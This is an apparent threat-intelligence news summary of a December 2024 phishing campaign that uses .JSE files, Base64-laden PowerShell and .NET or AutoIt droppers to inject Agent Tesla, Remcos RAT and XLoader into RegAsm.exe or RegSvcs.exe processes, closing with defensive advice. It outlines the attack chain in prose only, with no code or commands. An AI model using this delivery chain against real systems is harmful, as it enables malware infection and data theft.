In recent cybersecurity developments, a complex multi-stage malware attack has been identified, leveraging JavaScript Encoded (.JSE) files and PowerShell scripts to deliver notorious malware families such as Agent Tesla, Remcos RAT, and XLoader. This campaign underscores the evolving tactics of cybercriminals who employ intricate delivery mechanisms to evade detection and ensure successful payload execution.
Initial Attack Vector: Phishing Emails
The attack commences with a deceptive phishing email masquerading as an order request. These emails, observed in December 2024, falsely claim that a payment has been made and urge the recipient to review an attached order file. The attachment is a 7-zip archive containing a malicious .JSE file. When executed, this file initiates the infection sequence by downloading a PowerShell script from an external server.
Execution of PowerShell Script
The downloaded PowerShell script is embedded with a Base64-encoded payload. Upon decoding, the payload is written to the Windows temporary directory and executed. This step leads to the deployment of a next-stage dropper, which can be compiled using either .NET or AutoIt, introducing multiple execution paths to enhance resilience and complicate detection efforts.
Deployment of Final Payloads
In scenarios involving a .NET executable, the embedded payload—suspected to be variants of Agent Tesla, such as Snake Keylogger or XLoader—is decrypted and injected into a running RegAsm.exe process. This technique aligns with methods observed in previous Agent Tesla campaigns.
Alternatively, when the dropper is compiled using AutoIt, an additional layer is introduced to obfuscate analysis. The AutoIt script contains an encrypted payload responsible for loading the final shellcode, resulting in the injection of a .NET file into a RegSvcs.exe process, ultimately leading to the deployment of Agent Tesla.
Implications and Recommendations
This multi-layered attack strategy highlights the increasing sophistication of cyber threats. By stacking simple stages, attackers create resilient attack chains that complicate analysis and detection. Organizations are advised to implement robust email filtering systems, conduct regular security awareness training for employees, and maintain up-to-date endpoint protection solutions to mitigate such threats.
